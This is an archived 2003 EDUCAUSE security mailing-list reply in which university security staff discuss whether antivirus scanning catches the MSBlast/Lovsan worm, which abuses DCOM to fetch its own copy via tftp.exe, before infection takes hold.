Educause Security Discussion mailing list archives

Re: Interactions of AntiVirus and MBlaster/Lovsan-A & Stealther

From: Gary Dobbins <dobbins () ND EDU>
Date: Tue, 12 Aug 2003 13:15:07 -0500

What we know so far here suggests that the A/V would detect the worm's
file(s) as they're being written to disk, *if* scan on write is
enabled.  But, A/V will probably miss the initial incursion, where the
attacker initially causes the unwanted behaviour of the victim's DCOM
service process.

The attacker tells victim's DCOM to activate tftp.exe, instructing it
to fetch its own copy of the actual worm from the attacking machine.
At the point tftp writes the received file to disk A/V software may be
able to catch it, but the victim is already under the worm's control
at this point.  Assuming a variant strain of the worm doesn't appear,
a positive A/V alert indicates both presence of the vulnerability and
success of attack against the recipient.

Am surprised, actually, that the author wrote this worm to rely on
presence of tftp.exe.  Local tftp was used by 'ancient' worms such as
nimda, and some nimda remediation recommendations included removing
tftp.exe from machines where it wasn't needed.


Jim Moore wrote:

I am trying to understand how far Stealther and MBlaster/Lovsan-A get
before the latest antivirus intercpts them.  What has alarmed me is that
I have some reports of a reboot preceding the A/V warning.

Also, I am assuming that the most effective is when A/V is set to scan
on every write.  However, you know that impacts performance and a lot of
people slide back to scanning at lunch time, or in the evening.  I
assume that means that is then the window of opportunity for MBlaster.

I am not an A/V expert, can someone validate assumptions, and describe
how you handle it in communication to your end user community?

Jim
--
--
Jim Moore, CISSP, IAM
Information Security Officer
Rochester Institute of Technology
13 Lomb Memorial Drive
Rochester, NY 14623-5603
Telephone: (585)475-5406
Fax:       (585)475-7950

PGP (jimmoore () mail rit edu): 9C33 0328 CD59 B602 82B8 8521 0DC9 963C D0C0

**********
Participation and subscription information for this EDUCAUSE Discussion
Group discussion list can be found at http://www.educause.edu/cg/.


**********
Participation and subscription information for this EDUCAUSE Discussion Group discussion list can be found at 
http://www.educause.edu/cg/.

Current thread:

Interactions of AntiVirus and MBlaster/Lovsan-A & Stealther Jim Moore (Aug 12)
- <Possible follow-ups>
- Re: Interactions of AntiVirus and MBlaster/Lovsan-A & Stealther Gary Dobbins (Aug 12)
- Re: Interactions of AntiVirus and MBlaster/Lovsan-A & Stealther Jim Moore (Aug 12)
- Re: Interactions of AntiVirus and MBlaster/Lovsan-A & Stealther Omar Herrera (Aug 12)